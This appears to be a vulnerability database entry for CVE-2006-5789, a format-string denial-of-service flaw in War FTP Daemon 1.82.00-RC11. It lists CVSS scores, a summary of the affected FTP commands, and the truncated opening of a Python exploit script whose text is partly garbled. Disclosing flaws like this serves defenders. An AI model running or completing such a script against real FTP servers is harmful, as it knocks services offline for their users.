4
CVSSv2

CVE-2006-5789

Published: 07/11/2006 Updated: 17/10/2018
CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8
VMScore: 405
Vector: AV:N/AC:L/Au:S/C:N/I:N/A:P

Vulnerability Summary

War FTP Daemon (WarFTPd) 1.82.00-RC11 allows remote authenticated users to cause a denial of service via a large number of "%s" format strings in (1) CWD, (2) CDUP, (3) DELE, (4) NLST, (5) LIST, (6) SIZE, and possibly other commands. NOTE: it is possible that vector 1 is an off-by-one variant or incomplete fix of CVE-2005-0312.

Vulnerable Product Search on Vulmon Subscribe to Product

jgaa warftpd 1.82.00_rc11

Exploits

#!/usr/bin/env python import sys import ftplib print "WAR_FTPD Remote Denial Of Service (DOS)" print "Copyright (c) Joxean Koret" print target = "192168113" targetPort = "21" try: ftp = ftplibFTP() print "[+] Connecting to target " msg = ftpconnect(target, targetPort) print "[+] Ok Target banner" print msg print ...